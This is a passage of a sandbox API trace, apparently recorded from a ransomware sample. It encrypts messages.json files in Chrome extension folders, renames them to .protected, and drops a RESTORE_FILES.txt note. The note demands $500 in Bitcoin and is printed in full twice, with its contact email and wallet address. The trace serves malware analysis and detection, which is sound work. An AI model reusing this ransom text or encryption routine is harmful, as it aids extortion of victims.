(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.973] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.973] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.973] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.973] CloseHandle (hObject=0x164) returned 1 [0078.974] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.974] lstrcmpiW (lpString1="fi", lpString2="Windows") returned -1 [0078.974] lstrcmpiW (lpString1="fi", lpString2="Program Files") returned -1 [0078.974] lstrcmpiW (lpString1="fi", lpString2="Program Files (x86)") returned -1 [0078.974] lstrcmpiW (lpString1="fi", lpString2="$Recycle.bin") returned 1 [0078.974] lstrcmpiW (lpString1="fi", lpString2="System Volume Information") returned -1 [0078.974] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi") returned 141 [0078.974] lstrcmpW (lpString1="fi", lpString2=".") returned 1 [0078.974] lstrcmpW (lpString1="fi", lpString2="..") returned 1 [0078.974] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\*") returned 143 [0078.974] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.974] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.974] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.974] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.974] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.974] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.974] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\.") returned 143 [0078.974] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.974] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.974] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.974] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.974] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.974] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.974] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.974] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\..") returned 144 [0078.975] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.975] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.975] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.975] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.975] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.975] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.975] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.975] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.975] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json") returned 155 [0078.975] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.975] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.975] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.975] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.976] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json") returned 155 [0078.976] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.976] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json") returned 155 [0078.976] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.976] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json") returned 155 [0078.976] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.976] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd8, lpOverlapped=0x0) returned 1 [0078.977] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.977] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd8, lpOverlapped=0x0) returned 1 [0078.977] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.977] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.977] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.977] CloseHandle (hObject=0x168) returned 1 [0078.977] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.protected") returned 165 [0078.977] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.protected")) returned 1 [0078.977] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.978] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.978] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\RESTORE_FILES.txt") returned 159 [0078.978] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.978] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.978] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.978] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.979] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.979] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.979] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.979] CloseHandle (hObject=0x164) returned 1 [0078.979] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.979] lstrcmpiW (lpString1="fil", lpString2="Windows") returned -1 [0078.979] lstrcmpiW (lpString1="fil", lpString2="Program Files") returned -1 [0078.979] lstrcmpiW (lpString1="fil", lpString2="Program Files (x86)") returned -1 [0078.979] lstrcmpiW (lpString1="fil", lpString2="$Recycle.bin") returned 1 [0078.979] lstrcmpiW (lpString1="fil", lpString2="System Volume Information") returned -1 [0078.979] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil") returned 142 [0078.979] lstrcmpW (lpString1="fil", lpString2=".") returned 1 [0078.979] lstrcmpW (lpString1="fil", lpString2="..") returned 1 [0078.979] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\*") returned 144 [0078.979] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.979] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.979] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.979] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.979] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.979] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.979] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\.") returned 144 [0078.979] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.979] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.979] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.979] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.980] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.980] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.980] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.980] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\..") returned 145 [0078.980] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.980] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.980] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.980] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.980] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.980] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.980] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.980] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.980] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json") returned 156 [0078.980] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.980] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.980] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.980] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.980] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json") returned 156 [0078.980] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.980] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json") returned 156 [0078.980] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.980] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json") returned 156 [0078.980] StrStrW 
(lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.980] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdb, lpOverlapped=0x0) returned 1 [0078.981] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff25, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.981] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdb, lpOverlapped=0x0) returned 1 [0078.981] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.981] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.981] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.982] CloseHandle (hObject=0x168) returned 1 [0078.982] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.protected") returned 166 [0078.982] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.protected")) returned 1 [0078.982] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.982] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.982] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\RESTORE_FILES.txt") returned 160 [0078.982] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.982] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.982] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.983] lstrlenA 
